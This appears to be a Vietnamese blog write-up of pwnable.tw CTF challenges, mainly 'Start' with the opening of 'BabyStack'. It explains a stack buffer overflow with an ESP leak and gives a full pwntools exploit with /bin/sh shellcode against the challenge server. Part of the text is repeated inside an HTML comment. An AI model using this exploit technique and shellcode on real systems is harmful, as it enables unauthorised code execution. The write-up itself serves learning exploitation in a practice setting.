<p>Đề bài cho chúng ta duy nhất một file là <code class="language-plaintext highlighter-rouge">start</code>. Việc đầu tiên tôi thường làm sẽ là kiểm tra xem file là 32 hay 64 bits. Để kiểm tra, tôi thường dùng <code class="language-plaintext highlighter-rouge">file</code>.</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>file start
start: ELF 32-bit LSB executable, Intel 80386, version 1 <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, not stripped
</code></pre></div></div>

<p>Thông tin cho chúng ta biết được đây là một file 32 bits. Load chương trình vào IDAPRO x32, quan sát các hàm ở mục <code class="language-plaintext highlighter-rouge">Functions</code>, nhận thấy rằng chương trình chỉ xoay quanh hàm <code class="language-plaintext highlighter-rouge">_start</code>.</p>

<p>Tiếp đến, tôi sẽ sử dụng <code class="language-plaintext highlighter-rouge">checksec</code> để kiểm tra các lớp bảo vệ của file. Tôi đoán sẽ có nhiều bạn không hiểu dùng <code class="language-plaintext highlighter-rouge">checksec</code> để làm gì. Ngày trước tôi cũng như vậy, nhưng sau một khoảng thời gian ngắn, tôi được tiếp cận thêm về lỗ bổng <strong>BOF - Buffer Overflow</strong>, tôi mới thấy nó vô cũng hữu hiệu.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>checksec <span class="nt">--file</span><span class="o">=</span><span class="s2">"start"</span>
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   8<span class="o">)</span> Symbols        No    0               0               start
</code></pre></div></div>

<p>Đối với bài toán này, để đơn giản, các bạn chỉ cần quan tâm tới thông số <code class="language-plaintext highlighter-rouge">NX: Disabled</code>. Nghĩa là các bạn có thể chèn mã thực thi lên stack. Nếu <code class="language-plaintext highlighter-rouge">NX: Enabled</code>, cho dù mã thực thi được chèn lên stack thì nó vẫn sẽ không hoạt động.</p>
<h3 id="ii-phân-tích">
  
  
    II. Phân tích <a href="#ii-phân-tích">#</a>
  
  
</h3>
    

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>push    esp
push    offset _exit
xor     eax, eax
xor     ebx, ebx
xor     ecx, ecx
xor     edx, edx
push    3A465443h
push    20656874h
push    20747261h
push    74732073h
push    2774654Ch
mov     ecx, esp        ; addr
mov     dl, 14h         ; len
mov     bl, 1           ; fd
mov     al, 4
int     80h             ; LINUX - sys_write
xor     ebx, ebx
mov     dl, 3Ch ; '&lt;'
mov     al, 3
int     80h             ; LINUX -
add     esp, 14h
retn
</code></pre></div></div>

<p>Mã assembly của hàm <code class="language-plaintext highlighter-rouge">_start</code> rất dễ đọc, chúng ta sẽ đi phân tích nội dung từng đoạn code.</p>

<p>Việc đầu tiên là đẩy thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> và offset của hàm <code class="language-plaintext highlighter-rouge">_exit</code> vào trong stack. Sau đó, gán giá trị của 4 thanh ghi <code class="language-plaintext highlighter-rouge">EAX, EBX, ECX, EDX = 0</code>. Tiếp theo là đẩy các giá trị <code class="language-plaintext highlighter-rouge">3A465443h, 20656874h, 20747261h, 74732073h, 2774654Ch</code> vào trong stack.</p>

<p>Câu hỏi đặt ra ở đây là 5 con số trên là gì vậy? Rất đơn giản, nó chính là:</p>
<ul>
  <li>3A465443h = “:FTC”</li>
  <li>20656874h = “ eht”</li>
  <li>20747261h = “ tra”</li>
  <li>74732073h = “ts s”</li>
  <li>2774654Ch = “‘teL”</li>
</ul>

<p>Chúng đại diện cho chuỗi “<strong>Let’s start the CTF:</strong>”</p>

<p>Đoạn mã tiếp theo, chương trình gọi ra 2 system call là sys_write và sys_read</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov     ecx, esp        ; addr
mov     dl, 14h         ; len
mov     bl, 1           ; fd
mov     al, 4
int     80h             ; LINUX - sys_write
</code></pre></div></div>

<p>Thông tin của <code class="language-plaintext highlighter-rouge">sys_write</code>:</p>
<ul>
  <li>Xuất ra màn hình chuỗi từ địa chỉ ESP hiện tại</li>
  <li>Số byte: 0x14 bytes</li>
  <li>File descriptor: stdout</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xor     ebx, ebx
mov     dl, 3Ch ; '&lt;'
mov     al, 3
int     80h             ; LINUX - sys_read
</code></pre></div></div>

<p>Thông tin của <code class="language-plaintext highlighter-rouge">sys_read</code></p>
<ul>
  <li>Đọc một chuỗi từ bộ nhập chuẩn</li>
  <li>Số byte: 0x3C</li>
</ul>

<p>Đoạn mã cuối cùng tăng giá trị thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> lên 0x14 đơn vị. <code class="language-plaintext highlighter-rouge">retn</code> gọi địa chỉ thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> đang giữ rồi cộng <code class="language-plaintext highlighter-rouge">ESP</code> lên 4 đơn vị.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>add     esp, 14h
retn
</code></pre></div></div>
<h3 id="iii-lỗ-hổng">
  
  
    III. Lỗ hổng <a href="#iii-lỗ-hổng">#</a>
  
  
</h3>
    

<p>Chúng ta cùng nhìn qua cấu trúc của stack trước khi gọi 2 system call.</p>

<p><img src="/images/Pwnable.tw/0x01%20Start/image.png" alt="Alt text" /></p>

<p>Giá trị của thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ở:</p>
<ul>
  <li>Hiện tại:  <code class="language-plaintext highlighter-rouge">0xFFFFD124</code></li>
  <li>Ban đầu:  <code class="language-plaintext highlighter-rouge">0xFFFFD140</code></li>
</ul>

<p>Chú ý rằng, thường các challenge sẽ bật <strong>Address Space Layout Randomization</strong> nên giá trị thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu luôn có giá trị ngẫu nhiên. (Đây là lý do vì sao mình không lấy <code class="language-plaintext highlighter-rouge">ESP = 0xFFFFD140</code> để khai thác lỗ hổng)</p>

<p>Như ta đã phân tích ở trên, <code class="language-plaintext highlighter-rouge">sys_read</code> cho phép đọc 60 bytes vào stack. Nếu chúng đã nhập vào 20 bytes, thì từ địa chỉ <code class="language-plaintext highlighter-rouge">0xFFFFD124</code> đến <code class="language-plaintext highlighter-rouge">0xFFFFD134</code> sẽ được fill đủ.<br />
Giả sử chúng ta tiếp tục nhập vào, các giá trị tại các địa chỉ trên nó sẽ bị thay đổi. Dẫn tới lỗ hổng <strong>BOF</strong>.</p>
<h3 id="iv-hướng-tấn-công">
  
  
    IV. Hướng tấn công <a href="#iv-hướng-tấn-công">#</a>
  
  
</h3>
    

<p>Công việc chúng ta cần thực hiện:</p>
<ol>
  <li>Lấy được địa chỉ thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu.</li>
  <li>Từ việc có được giá trị thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu, chúng ta sẽ đưa địa chỉ trả về của hàm là địa chỉ của shellcode.</li>
</ol>
<h3 id="công-việc-1">
  
  
    Công việc 1 <a href="#công-việc-1">#</a>
  
  
</h3>
    
<p><img src="/images/Pwnable.tw/0x01%20Start/image-1.png" alt="Alt text" /></p>

<p>Để lấy giá trị của thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu rất đơn giản. Chúng ta nhập đủ 20 bytes để lấp đầy địa chỉ từ <code class="language-plaintext highlighter-rouge">0xFFFFD124</code> đến <code class="language-plaintext highlighter-rouge">0xFFFFD134</code>, tiếp tục ghi thêm 4 bytes <code class="language-plaintext highlighter-rouge">0x08048087</code> để chương trình có thể gọi system call read và write lần thứ 2.</p>

<p>Bây giờ, giá trị của thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> sẽ là: <code class="language-plaintext highlighter-rouge">0xFFFFD124 + 0x14 + 0x4 = 0xFFFFD13C</code>. Chú ý, đây cũng là nơi chứa giá trị thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu.</p>

<p>Lợi dụng việc gọi <code class="language-plaintext highlighter-rouge">sys_write</code> lần thứ 2. Chỉ cần in ra 4 bytes đầu tiên, chúng ta sẽ lấy được địa chỉ <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload1</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">x</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x14</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="mh">0x08048087</span><span class="p">)</span>
<span class="n">r</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">:</span><span class="sh">'</span><span class="p">,</span> <span class="n">payload1</span><span class="p">)</span> 
<span class="n">esp_leaked</span> <span class="o">=</span> <span class="nf">u32</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="nf">recv</span><span class="p">()[:</span><span class="mi">4</span><span class="p">])</span>
</code></pre></div></div>
<h3 id="công-việc-2">
  
  
    Công việc 2 <a href="#công-việc-2">#</a>
  
  
</h3>
    

<p>Sau khi đã có địa chỉ <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu. Việc của chúng ta là phải tính toán xem phải input bao nhiêu ký tự để chương trình có thể thực thi được shellcode.</p>

<p>Gọi địa chỉ <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu là <code class="language-plaintext highlighter-rouge">ESP = X</code>, giá trị hiện tại <code class="language-plaintext highlighter-rouge">ESP = X - 4</code></p>

<p><img src="/images/Pwnable.tw/0x01%20Start/image-2.png" alt="Alt text" /></p>

<p>Sau khi <code class="language-plaintext highlighter-rouge">sys_read</code> được gọi, <code class="language-plaintext highlighter-rouge">ESP + 0x14</code>, nghĩa là <code class="language-plaintext highlighter-rouge">ESP</code> đứng ở <code class="language-plaintext highlighter-rouge">X + 16</code>. Ở <code class="language-plaintext highlighter-rouge">X + 16</code>, chúng ta chỉ cần gán cho nó giá trị là <code class="language-plaintext highlighter-rouge">X + 20</code>, nơi shellcode được viết. Hàm trả về sẽ là địa chỉ shellcode được bắt đầu.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload2</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">x</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x14</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="n">leaked_esp</span> <span class="o">+</span> <span class="mh">0x14</span><span class="p">)</span> <span class="o">+</span> <span class="n">shellcode</span>
</code></pre></div></div>
<h3 id="v-mã-khai-thác">
  
  
    V. Mã khai thác <a href="#v-mã-khai-thác">#</a>
  
  
</h3>
    
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">r</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="sh">"</span><span class="s">chall.pwnable.tw</span><span class="sh">"</span><span class="p">,</span> <span class="mi">10000</span><span class="p">)</span>

<span class="n">shellcode</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80</span><span class="sh">"</span> 

<span class="n">payload1</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">x</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x14</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="mh">0x08048087</span><span class="p">)</span>
<span class="n">r</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">:</span><span class="sh">'</span><span class="p">,</span> <span class="n">payload1</span><span class="p">)</span> 
<span class="n">esp_leaked</span> <span class="o">=</span> <span class="nf">u32</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="nf">recv</span><span class="p">()[:</span><span class="mi">4</span><span class="p">])</span>
<span class="n">payload2</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">x</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x14</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="n">esp_leaked</span> <span class="o">+</span> <span class="mh">0x14</span><span class="p">)</span> <span class="o">+</span> <span class="n">shellcode</span>
<span class="n">r</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">payload2</span><span class="p">)</span>

<span class="n">r</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
</code></pre></div></div>
<h3 id="vi-tham-khảo">
  
  
    VI. Tham khảo <a href="#vi-tham-khảo">#</a>
  
  
</h3>
    
<ol>
  <li><a href="https://hackmd.io/@y198/ry6GrF3gi">Pwnable.tw - Start @y198</a></li>
  <li><a href="https://blog.csdn.net/weixin_43483799/article/details/113844032">Pwnable.tw - Start @c01dkit</a></li>
</ol>
<h2 id="0x02-babystack">
  
  
    0x02 BabyStack <a href="#0x02-babystack">#</a>
  
  
</h2>
    

<p>Sau khi decompile và rename các biến, chúng ta thu được mã giả như sau</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">main</span><span class="p">(</span><span class="n">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a2</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a3</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">_QWORD</span> <span class="o">*</span><span class="n">v3</span><span class="p">;</span> <span class="c1">// rcx</span>
    <span class="n">__int64</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// rdx</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-60h] BYREF</span>
    <span class="n">__int64</span> <span class="n">random_password</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> <span class="c1">// [rsp+40h] [rbp-20h] BYREF</span>
    <span class="kt">char</span> <span class="n">option</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> <span class="c1">// [rsp+50h] [rbp-10h] BYREF</span>

    <span class="n">mmap_canary</span><span class="p">();</span>
    <span class="n">random_fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">"/dev/urandom"</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="n">read</span><span class="p">(</span><span class="n">random_fd</span><span class="p">,</span> <span class="n">random_password</span><span class="p">,</span> <span class="mh">0x10uLL</span><span class="p">);</span>
    <span class="n">v3</span> <span class="o">=</span> <span class="n">canary</span><span class="p">;</span>
    <span class="n">v4</span> <span class="o">=</span> <span class="n">random_password</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">canary</span> <span class="o">=</span> <span class="n">random_password</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="n">v3</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">v4</span><span class="p">;</span>
    <span class="n">close</span><span class="p">(</span><span class="n">random_fd</span><span class="p">);</span>
    <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"&gt;&gt; "</span><span class="p">,</span> <span class="mi">3uLL</span><span class="p">);</span>
        <span class="n">read_</span><span class="p">(</span><span class="mi">0LL</span><span class="p">,</span> <span class="n">option</span><span class="p">,</span> <span class="mh">0x10LL</span><span class="p">,</span> <span class="mh">0x10LL</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span> <span class="n">option</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'2'</span> <span class="p">)</span>                 <span class="c1">// exit()</span>
        <span class="p">{</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="p">(</span> <span class="n">option</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'3'</span> <span class="p">)</span>
        <span class="p">{</span>
            <span class="k">if</span> <span class="p">(</span> <span class="n">status_login</span> <span class="p">)</span>
            <span class="p">{</span>
                <span class="n">copy_input</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
            <span class="p">}</span>
            <span class="k">else</span>
            <span class="p">{</span>
<span class="nl">LABEL_x1040:</span>
                <span class="n">puts</span><span class="p">(</span><span class="s">"Invalid choice"</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>
        <span class="k">else</span>
        <span class="p">{</span>
            <span class="k">if</span> <span class="p">(</span> <span class="n">option</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="sc">'1'</span> <span class="p">)</span>
            <span class="p">{</span>
                <span class="k">goto</span> <span class="n">LABEL_x1040</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="k">if</span> <span class="p">(</span> <span class="n">status_login</span> <span class="p">)</span>
            <span class="p">{</span>
                <span class="n">status_login</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
            <span class="p">}</span>
            <span class="k">else</span>
            <span class="p">{</span>
                <span class="n">login</span><span class="p">((</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">random_password</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">status_login</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">memcmp</span><span class="p">(</span><span class="n">random_password</span><span class="p">,</span> <span class="n">canary</span><span class="p">,</span> <span class="mh">0x10uLL</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0LL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
    <!-- <h2 id="table-of-content">Table of Content</h2>
<ul>
  <li><a href="#0x00-lời-chào">0x00 Lời chào</a></li>
  <li><a href="#0x01-start">0x01 Start</a></li>
  <li><a href="#0x02-babystack">0x02 BabyStack</a></li>
</ul>

<h2 id="0x00-lời-chào">0x00 Lời chào</h2>
<p>Khoảng một tháng trở lại đây, tôi chuyên tâm hơn vào việc chơi pwn. Một phần là vì mảng pwn khó, phần còn lại là tôi nghĩ nó có thể giúp tôi kiếm được tiền :)) Vì là một người mới, những kiến thức mà tôi viết ở đây có thể chưa chính xác hoàn toàn. Rất mong các bạn đọc góp ý để tôi phát triển hơn nữa.</p>

<p><a href="https://pwnable.tw/">Pwnable.tw</a> là một trang luyện tập mảng pwn khá nổi tiếng của Đài Loan. Theo tôi cảm nhận, thử thách ở đây khá khó cho người mới. Nếu các bạn không làm được thì cũng đừng lấy gì làm lạ. Tôi đã mất khoảng hơn 1 tuần để nghiền ngẫm challenge đầu tiên.</p>

<h2 id="0x01-start">0x01 Start</h2>

<h3 id="i-tổng-quan">I. Tổng quan</h3>
<p><img src="/images/Pwnable.tw/0x01%20Start/start.png" alt="" /></p>

<p>Đề bài cho chúng ta duy nhất một file là <code class="language-plaintext highlighter-rouge">start</code>. Việc đầu tiên tôi thường làm sẽ là kiểm tra xem file là 32 hay 64 bits. Để kiểm tra, tôi thường dùng <code class="language-plaintext highlighter-rouge">file</code>.</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>file start
start: ELF 32-bit LSB executable, Intel 80386, version 1 <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, not stripped
</code></pre></div></div>

<p>Thông tin cho chúng ta biết được đây là một file 32 bits. Load chương trình vào IDAPRO x32, quan sát các hàm ở mục <code class="language-plaintext highlighter-rouge">Functions</code>, nhận thấy rằng chương trình chỉ xoay quanh hàm <code class="language-plaintext highlighter-rouge">_start</code>.</p>

<p>Tiếp đến, tôi sẽ sử dụng <code class="language-plaintext highlighter-rouge">checksec</code> để kiểm tra các lớp bảo vệ của file. Tôi đoán sẽ có nhiều bạn không hiểu dùng <code class="language-plaintext highlighter-rouge">checksec</code> để làm gì. Ngày trước tôi cũng như vậy, nhưng sau một khoảng thời gian ngắn, tôi được tiếp cận thêm về lỗ bổng <strong>BOF - Buffer Overflow</strong>, tôi mới thấy nó vô cũng hữu hiệu.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>checksec <span class="nt">--file</span><span class="o">=</span><span class="s2">"start"</span>
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   8<span class="o">)</span> Symbols        No    0               0               start
</code></pre></div></div>

<p>Đối với bài toán này, để đơn giản, các bạn chỉ cần quan tâm tới thông số <code class="language-plaintext highlighter-rouge">NX: Disabled</code>. Nghĩa là các bạn có thể chèn mã thực thi lên stack. Nếu <code class="language-plaintext highlighter-rouge">NX: Enabled</code>, cho dù mã thực thi được chèn lên stack thì nó vẫn sẽ không hoạt động.</p>

<h3 id="ii-phân-tích">II. Phân tích</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>push    esp
push    offset _exit
xor     eax, eax
xor     ebx, ebx
xor     ecx, ecx
xor     edx, edx
push    3A465443h
push    20656874h
push    20747261h
push    74732073h
push    2774654Ch
mov     ecx, esp        ; addr
mov     dl, 14h         ; len
mov     bl, 1           ; fd
mov     al, 4
int     80h             ; LINUX - sys_write
xor     ebx, ebx
mov     dl, 3Ch ; '&lt;'
mov     al, 3
int     80h             ; LINUX -
add     esp, 14h
retn
</code></pre></div></div>

<p>Mã assembly của hàm <code class="language-plaintext highlighter-rouge">_start</code> rất dễ đọc, chúng ta sẽ đi phân tích nội dung từng đoạn code.</p>

<p>Việc đầu tiên là đẩy thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> và offset của hàm <code class="language-plaintext highlighter-rouge">_exit</code> vào trong stack. Sau đó, gán giá trị của 4 thanh ghi <code class="language-plaintext highlighter-rouge">EAX, EBX, ECX, EDX = 0</code>. Tiếp theo là đẩy các giá trị <code class="language-plaintext highlighter-rouge">3A465443h, 20656874h, 20747261h, 74732073h, 2774654Ch</code> vào trong stack.</p>

<p>Câu hỏi đặt ra ở đây là 5 con số trên là gì vậy? Rất đơn giản, nó chính là:</p>
<ul>
  <li>3A465443h = “:FTC”</li>
  <li>20656874h = “ eht”</li>
  <li>20747261h = “ tra”</li>
  <li>74732073h = “ts s”</li>
  <li>2774654Ch = “‘teL”</li>
</ul>

<p>Chúng đại diện cho chuỗi “<strong>Let’s start the CTF:</strong>”</p>

<p>Đoạn mã tiếp theo, chương trình gọi ra 2 system call là sys_write và sys_read</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov     ecx, esp        ; addr
mov     dl, 14h         ; len
mov     bl, 1           ; fd
mov     al, 4
int     80h             ; LINUX - sys_write
</code></pre></div></div>

<p>Thông tin của <code class="language-plaintext highlighter-rouge">sys_write</code>:</p>
<ul>
  <li>Xuất ra màn hình chuỗi từ địa chỉ ESP hiện tại</li>
  <li>Số byte: 0x14 bytes</li>
  <li>File descriptor: stdout</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xor     ebx, ebx
mov     dl, 3Ch ; '&lt;'
mov     al, 3
int     80h             ; LINUX - sys_read
</code></pre></div></div>

<p>Thông tin của <code class="language-plaintext highlighter-rouge">sys_read</code></p>
<ul>
  <li>Đọc một chuỗi từ bộ nhập chuẩn</li>
  <li>Số byte: 0x3C</li>
</ul>

<p>Đoạn mã cuối cùng tăng giá trị thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> lên 0x14 đơn vị. <code class="language-plaintext highlighter-rouge">retn</code> gọi địa chỉ thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> đang giữ rồi cộng <code class="language-plaintext highlighter-rouge">ESP</code> lên 4 đơn vị.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>add     esp, 14h
retn
</code></pre></div></div>

<h3 id="iii-lỗ-hổng">III. Lỗ hổng</h3>

<p>Chúng ta cùng nhìn qua cấu trúc của stack trước khi gọi 2 system call.</p>

<p><img src="/images/Pwnable.tw/0x01%20Start/image.png" alt="Alt text" /></p>

<p>Giá trị của thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ở:</p>
<ul>
  <li>Hiện tại:  <code class="language-plaintext highlighter-rouge">0xFFFFD124</code></li>
  <li>Ban đầu:  <code class="language-plaintext highlighter-rouge">0xFFFFD140</code></li>
</ul>

<p>Chú ý rằng, thường các challenge sẽ bật <strong>Address Space Layout Randomization</strong> nên giá trị thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu luôn có giá trị ngẫu nhiên. (Đây là lý do vì sao mình không lấy <code class="language-plaintext highlighter-rouge">ESP = 0xFFFFD140</code> để khai thác lỗ hổng)</p>

<p>Như ta đã phân tích ở trên, <code class="language-plaintext highlighter-rouge">sys_read</code> cho phép đọc 60 bytes vào stack. Nếu chúng đã nhập vào 20 bytes, thì từ địa chỉ <code class="language-plaintext highlighter-rouge">0xFFFFD124</code> đến <code class="language-plaintext highlighter-rouge">0xFFFFD134</code> sẽ được fill đủ.<br />
Giả sử chúng ta tiếp tục nhập vào, các giá trị tại các địa chỉ trên nó sẽ bị thay đổi. Dẫn tới lỗ hổng <strong>BOF</strong>.</p>

<h3 id="iv-hướng-tấn-công">IV. Hướng tấn công</h3>

<p>Công việc chúng ta cần thực hiện:</p>
<ol>
  <li>Lấy được địa chỉ thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu.</li>
  <li>Từ việc có được giá trị thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu, chúng ta sẽ đưa địa chỉ trả về của hàm là địa chỉ của shellcode.</li>
</ol>

<h3 id="công-việc-1">Công việc 1</h3>
<p><img src="/images/Pwnable.tw/0x01%20Start/image-1.png" alt="Alt text" /></p>

<p>Để lấy giá trị của thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu rất đơn giản. Chúng ta nhập đủ 20 bytes để lấp đầy địa chỉ từ <code class="language-plaintext highlighter-rouge">0xFFFFD124</code> đến <code class="language-plaintext highlighter-rouge">0xFFFFD134</code>, tiếp tục ghi thêm 4 bytes <code class="language-plaintext highlighter-rouge">0x08048087</code> để chương trình có thể gọi system call read và write lần thứ 2.</p>

<p>Bây giờ, giá trị của thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> sẽ là: <code class="language-plaintext highlighter-rouge">0xFFFFD124 + 0x14 + 0x4 = 0xFFFFD13C</code>. Chú ý, đây cũng là nơi chứa giá trị thanh ghi <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu.</p>

<p>Lợi dụng việc gọi <code class="language-plaintext highlighter-rouge">sys_write</code> lần thứ 2. Chỉ cần in ra 4 bytes đầu tiên, chúng ta sẽ lấy được địa chỉ <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload1</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">x</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x14</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="mh">0x08048087</span><span class="p">)</span>
<span class="n">r</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">:</span><span class="sh">'</span><span class="p">,</span> <span class="n">payload1</span><span class="p">)</span> 
<span class="n">esp_leaked</span> <span class="o">=</span> <span class="nf">u32</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="nf">recv</span><span class="p">()[:</span><span class="mi">4</span><span class="p">])</span>
</code></pre></div></div>

<h3 id="công-việc-2">Công việc 2</h3>

<p>Sau khi đã có địa chỉ <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu. Việc của chúng ta là phải tính toán xem phải input bao nhiêu ký tự để chương trình có thể thực thi được shellcode.</p>

<p>Gọi địa chỉ <code class="language-plaintext highlighter-rouge">ESP</code> ban đầu là <code class="language-plaintext highlighter-rouge">ESP = X</code>, giá trị hiện tại <code class="language-plaintext highlighter-rouge">ESP = X - 4</code></p>

<p><img src="/images/Pwnable.tw/0x01%20Start/image-2.png" alt="Alt text" /></p>

<p>Sau khi <code class="language-plaintext highlighter-rouge">sys_read</code> được gọi, <code class="language-plaintext highlighter-rouge">ESP + 0x14</code>, nghĩa là <code class="language-plaintext highlighter-rouge">ESP</code> đứng ở <code class="language-plaintext highlighter-rouge">X + 16</code>. Ở <code class="language-plaintext highlighter-rouge">X + 16</code>, chúng ta chỉ cần gán cho nó giá trị là <code class="language-plaintext highlighter-rouge">X + 20</code>, nơi shellcode được viết. Hàm trả về sẽ là địa chỉ shellcode được bắt đầu.</p>

